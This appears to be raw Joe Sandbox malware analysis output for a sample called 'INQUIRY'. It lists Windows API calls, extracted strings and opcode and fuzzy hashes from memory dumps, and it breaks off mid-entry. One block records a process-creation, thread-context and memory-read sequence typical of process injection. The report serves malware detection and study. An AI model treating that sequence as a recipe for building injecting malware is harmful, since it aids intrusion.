                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                              • String ID:
                                                                                              • API String ID: 1552873950-0
                                                                                              • Opcode ID: 50af52b8f22919c11c7515362fb071ee60fc7e1c9e9e4129b0e36dbf2dd802cb
                                                                                              • Instruction ID: e97c04e5ed2953790662e8d0fe52fbfc4a746f94e2054b1a3ecbbab49a4896bf
                                                                                              • Opcode Fuzzy Hash: 50af52b8f22919c11c7515362fb071ee60fc7e1c9e9e4129b0e36dbf2dd802cb
                                                                                              • Instruction Fuzzy Hash: 93514DB5D04258AFDF249F64CC85A9EBBB9EF48300F10449EF60DA7241DB715A81CF58
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 2782032738-0
                                                                                              • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                              • Instruction ID: d47a6f89a3114f5b9205431722e68f01bdc4b9908b9e3863208ab738da1c4c0e
                                                                                              • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                              • Instruction Fuzzy Hash: 0141C375A007469BDB28CF69D9819AE7BB5EF4A360F24817DF815C7640DB70FD418B40
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00A4EA39
                                                                                              • GetOpenFileNameW.COMDLG32(?), ref: 00A4EA83
                                                                                                • Part of subcall function 00A14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A14743,?,?,00A137AE,?), ref: 00A14770
                                                                                                • Part of subcall function 00A30791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00A307B0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Name$Path$FileFullLongOpen_memset
                                                                                              • String ID: X
                                                                                              • API String ID: 3777226403-3081909835
                                                                                              • Opcode ID: 0f2e8d749cd05a5f8ad02dab48992e915ed46ea35934ef1c23927b0003262e39
                                                                                              • Instruction ID: 6604a32cadceb364ad848d8d45f3adf153b7291aea2962b1b3de6f0dd19014ae
                                                                                              • Opcode Fuzzy Hash: 0f2e8d749cd05a5f8ad02dab48992e915ed46ea35934ef1c23927b0003262e39
                                                                                              • Instruction Fuzzy Hash: CE21A271A042589BDF41DFD8D845BEE7BF8AF49714F00405AF409EB241DFB859898FA1
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: __fread_nolock_memmove
                                                                                              • String ID: EA06
                                                                                              • API String ID: 1988441806-3962188686
                                                                                              • Opcode ID: 51c5f66368a78ce6c53547d7437c2b16b894b7ef75d496922e01182d1fff2b92
                                                                                              • Instruction ID: f488c76ecd9095c43e2e08ed8aa363f5c788c196cbe9adbe986dc125c99632e3
                                                                                              • Opcode Fuzzy Hash: 51c5f66368a78ce6c53547d7437c2b16b894b7ef75d496922e01182d1fff2b92
                                                                                              • Instruction Fuzzy Hash: 5101DD72D442187EDB28CBA8CC56EFE7BF8DB15311F00459FF556D2181E979E6048760
                                                                                              APIs
                                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 00A798F8
                                                                                              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00A7990F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Temp$FileNamePath
                                                                                              • String ID: aut
                                                                                              • API String ID: 3285503233-3010740371
                                                                                              • Opcode ID: 31470e2c3c2cee7a8e1cd3d4de59e481cd2cb220da82f591f07a4258e00028ec
                                                                                              • Instruction ID: e12c9b1b294fdc40ea198d9ede601eb01f5471ba61a5b6bc9a5ff72d67e22bc6
                                                                                              • Opcode Fuzzy Hash: 31470e2c3c2cee7a8e1cd3d4de59e481cd2cb220da82f591f07a4258e00028ec
                                                                                              • Instruction Fuzzy Hash: 9FD0177964030DABDB50DBA49C0AFDA772CA704700F0006A2BA54D10A1EEB095998B91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 17b265aca5cc83bf436897ae33316b12a381614049ba670f3bf04b26b0464eeb
                                                                                              • Instruction ID: 592a05aa0a61434a344efe9acdde37bc6df69f70638f419d2b28b9394c30ec91
                                                                                              • Opcode Fuzzy Hash: 17b265aca5cc83bf436897ae33316b12a381614049ba670f3bf04b26b0464eeb
                                                                                              • Instruction Fuzzy Hash: D1F149716083019FCB14EF28C584A6ABBE5FF89324F14892EF9999B351D730E945CF92
                                                                                              APIs
                                                                                                • Part of subcall function 00A30162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A30193
                                                                                                • Part of subcall function 00A30162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00A3019B
                                                                                                • Part of subcall function 00A30162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A301A6
                                                                                                • Part of subcall function 00A30162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A301B1
                                                                                                • Part of subcall function 00A30162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00A301B9
                                                                                                • Part of subcall function 00A30162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00A301C1
                                                                                                • Part of subcall function 00A260F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00A1F930), ref: 00A26154
                                                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00A1F9CD
                                                                                              • OleInitialize.OLE32(00000000), ref: 00A1FA4A
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A545C8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1986988660-0
                                                                                              • Opcode ID: ddef02b5251ee5f552d87e0a079e0de1392daa1ec9a355ed27c230c270f02d26
                                                                                              • Instruction ID: 182561036b1f43ee8dbaead0a4f98eac0d2700ce76d561d6b0fd0b587cc0adcb
                                                                                              • Opcode Fuzzy Hash: ddef02b5251ee5f552d87e0a079e0de1392daa1ec9a355ed27c230c270f02d26
                                                                                              • Instruction Fuzzy Hash: E5819EF0D02A408FC384DFB9EA54A597BE6FB59306760852BD01BCB361E7744486CF12
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00A14370
                                                                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A14415
                                                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00A14432
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconNotifyShell_$_memset
                                                                                              • String ID:
                                                                                              • API String ID: 1505330794-0
                                                                                              • Opcode ID: e05092cd2d31424f2295cb0b177fff798494df7b906de84bd0f085a7a133b5a8
                                                                                              • Instruction ID: a5ac438a369ad5a27669672df7bd8d6185af14ded3de2b694bcbb2c6ace0f238
                                                                                              • Opcode Fuzzy Hash: e05092cd2d31424f2295cb0b177fff798494df7b906de84bd0f085a7a133b5a8
                                                                                              • Instruction Fuzzy Hash: C0318EB09057018FD721DF78D8846DBBBF8FB49309F00092EE59A86251E770A989CB52
                                                                                              APIs
                                                                                              • __FF_MSGBANNER.LIBCMT ref: 00A35733
                                                                                                • Part of subcall function 00A3A16B: __NMSG_WRITE.LIBCMT ref: 00A3A192
                                                                                                • Part of subcall function 00A3A16B: __NMSG_WRITE.LIBCMT ref: 00A3A19C
                                                                                              • __NMSG_WRITE.LIBCMT ref: 00A3573A
                                                                                                • Part of subcall function 00A3A1C8: GetModuleFileNameW.KERNEL32(00000000,00AD33BA,00000104,?,00000001,00000000), ref: 00A3A25A
                                                                                                • Part of subcall function 00A3A1C8: ___crtMessageBoxW.LIBCMT ref: 00A3A308
                                                                                                • Part of subcall function 00A3309F: ___crtCorExitProcess.LIBCMT ref: 00A330A5
                                                                                                • Part of subcall function 00A3309F: ExitProcess.KERNEL32 ref: 00A330AE
                                                                                                • Part of subcall function 00A38B28: __getptd_noexit.LIBCMT ref: 00A38B28
                                                                                              • RtlAllocateHeap.NTDLL(010D0000,00000000,00000001,00000000,?,?,?,00A30DD3,?), ref: 00A3575F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                              • String ID:
                                                                                              • API String ID: 1372826849-0
                                                                                              • Opcode ID: e5bcc8ee0d866cb5643cc6ab4d54c6af66046972f8da7ea948df1a0d9139a1a6
                                                                                              • Instruction ID: 35c09d3e08102db1a821a47d3fbb2aedf3b11ed0ea278bc65ca70454f02efe06
                                                                                              • Opcode Fuzzy Hash: e5bcc8ee0d866cb5643cc6ab4d54c6af66046972f8da7ea948df1a0d9139a1a6
                                                                                              • Instruction Fuzzy Hash: 61012432B00B12DEDA146B7CFD82A6E73988F92761F100D36F90ADB1D1DEB08C014661
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00A79548,?,?,?,?,?,00000004), ref: 00A798BB
                                                                                              • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00A79548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00A798D1
                                                                                              • CloseHandle.KERNEL32(00000000,?,00A79548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00A798D8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CloseCreateHandleTime
                                                                                              • String ID:
                                                                                              • API String ID: 3397143404-0
                                                                                              • Opcode ID: 81716a7b8c3152720c3d9e82259be507dd2e25b21781b968e4d1fe2358334a88
                                                                                              • Instruction ID: d696e30e96ea3d69ad05b04d889dfd5ad68366c7a992c5f98cad61582f93f0a7
                                                                                              • Opcode Fuzzy Hash: 81716a7b8c3152720c3d9e82259be507dd2e25b21781b968e4d1fe2358334a88
                                                                                              • Instruction Fuzzy Hash: 1DE08632241224BBD7215BA4EC09FCA7B59EB06760F208222FB28A90E08BB1151297D8
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00A78D1B
                                                                                                • Part of subcall function 00A32D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00A39A24), ref: 00A32D69
                                                                                                • Part of subcall function 00A32D55: GetLastError.KERNEL32(00000000,?,00A39A24), ref: 00A32D7B
                                                                                              • _free.LIBCMT ref: 00A78D2C
                                                                                              • _free.LIBCMT ref: 00A78D3E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: c56cf7ee783aa8295308e84720220828ccc4d403300e1e82c1220f1652f177a4
                                                                                              • Instruction ID: b59e3f34662b1dcd5d38506ba0b2e380587412ec7349cc2c38fab972349f50b7
                                                                                              • Opcode Fuzzy Hash: c56cf7ee783aa8295308e84720220828ccc4d403300e1e82c1220f1652f177a4
                                                                                              • Instruction Fuzzy Hash: 94E012B164160147CB34A778AE48B9313DC4F58792B24891DB40DD7187DF68F8428228
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: CALL
                                                                                              • API String ID: 0-4196123274
                                                                                              • Opcode ID: 12f3b9b567e1da9699cfb1fc4b2dfee027e10515dcbe693f17a373e47a14e7dd
                                                                                              • Instruction ID: 855e18780c737f8d45dee38703b3c25c9419c278330b6b52eac02a292c4adf94
                                                                                              • Opcode Fuzzy Hash: 12f3b9b567e1da9699cfb1fc4b2dfee027e10515dcbe693f17a373e47a14e7dd
                                                                                              • Instruction Fuzzy Hash: BF224774609311DFCB24DF14C590AAABBF1BF95314F14896DE89A8B362D731EC85CB82
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID: EA06
                                                                                              • API String ID: 4104443479-3962188686
                                                                                              • Opcode ID: a8c04ebe664eeb5b2fc6974c66a753eb9ce7865699dcf8513c9d02fa3e1f04ff
                                                                                              • Instruction ID: 555ffbc029c7b32d6cb7cd048bad4d20243ecf542ad44a1db4a894c324196603
                                                                                              • Opcode Fuzzy Hash: a8c04ebe664eeb5b2fc6974c66a753eb9ce7865699dcf8513c9d02fa3e1f04ff
                                                                                              • Instruction Fuzzy Hash: 99413D71A041585BDF219B6CE961BFE7FB69B4D300F684475EC82AB286D6209DC483A2
                                                                                              APIs
                                                                                              • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 01DA238A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694788619.0000000001DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01DA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1da0000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateProcess
                                                                                              • String ID: D
                                                                                              • API String ID: 963392458-2746444292
                                                                                              • Opcode ID: d8032cd0c60c85bdcbdd1e95e32548ef73afa8e82147693fe147fc67f90273c0
                                                                                              • Instruction ID: 6bd151c5d810d55f16701c9bac0fbc7595f40d2e063f6fa0afaf44de928b3b5c
                                                                                              • Opcode Fuzzy Hash: d8032cd0c60c85bdcbdd1e95e32548ef73afa8e82147693fe147fc67f90273c0
                                                                                              • Instruction Fuzzy Hash: 34011D7191030CAFDB20EBE1CC59FFE777CBF44701F80895DAA569A180EA74E6088B61
                                                                                              APIs
                                                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 01DA1ACD
                                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01DA1AF1
                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01DA1B13
                                                                                              • TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 01DA1E1C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694788619.0000000001DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01DA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1da0000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$ContextCreateMemoryReadTerminateThreadWow64
                                                                                              • String ID:
                                                                                              • API String ID: 572931308-0
                                                                                              • Opcode ID: cda9e504f2d45f499d696161523d23a525f419a6d7e2a7c62ebf8d064aefc9a0
                                                                                              • Instruction ID: b5da93e3d89d4ddf17f247e3d9b242ac67aa07b9a3481dc9c3c18fa75cf8ae89
                                                                                              • Opcode Fuzzy Hash: cda9e504f2d45f499d696161523d23a525f419a6d7e2a7c62ebf8d064aefc9a0
                                                                                              • Instruction Fuzzy Hash: 9612CD24E24658C6EB24DF64D8507DEB232EF68300F5090E9910DEB7A5E77A4F81CF5A
                                                                                              APIs
                                                                                              • IsThemeActive.UXTHEME ref: 00A14834
                                                                                                • Part of subcall function 00A3336C: __lock.LIBCMT ref: 00A33372
                                                                                                • Part of subcall function 00A3336C: DecodePointer.KERNEL32(00000001,?,00A14849,00A67C74), ref: 00A3337E
                                                                                                • Part of subcall function 00A3336C: EncodePointer.KERNEL32(?,?,00A14849,00A67C74), ref: 00A33389
                                                                                                • Part of subcall function 00A148FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00A14915
                                                                                                • Part of subcall function 00A148FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00A1492A
                                                                                                • Part of subcall function 00A13B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A13B68
                                                                                                • Part of subcall function 00A13B3A: IsDebuggerPresent.KERNEL32 ref: 00A13B7A
                                                                                                • Part of subcall function 00A13B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00AD52F8,00AD52E0,?,?), ref: 00A13BEB
                                                                                                • Part of subcall function 00A13B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00A13C6F
                                                                                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00A14874
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                              • String ID:
                                                                                              • API String ID: 1438897964-0
                                                                                              • Opcode ID: cc819cb63cf5e6d49dc247e775cdfaac25009f2355e940375cad0a179bf4cf7a
                                                                                              • Instruction ID: b641bb0d73353354205e34216a58042a4635c26e288f2a1924bd89aab1622eb4
                                                                                              • Opcode Fuzzy Hash: cc819cb63cf5e6d49dc247e775cdfaac25009f2355e940375cad0a179bf4cf7a
                                                                                              • Instruction Fuzzy Hash: 5C118CB29093019FCB00DFB9D94598ABBE8FB89750F10491BF041872B1DB70958ACB92
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00A15821,?,?,?,?), ref: 00A15CC7
                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00A15821,?,?,?,?), ref: 00A4DD73
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: 5930e498d5eda28642b9942498f147e92246bffe31f168fbef678fc5a02f380f
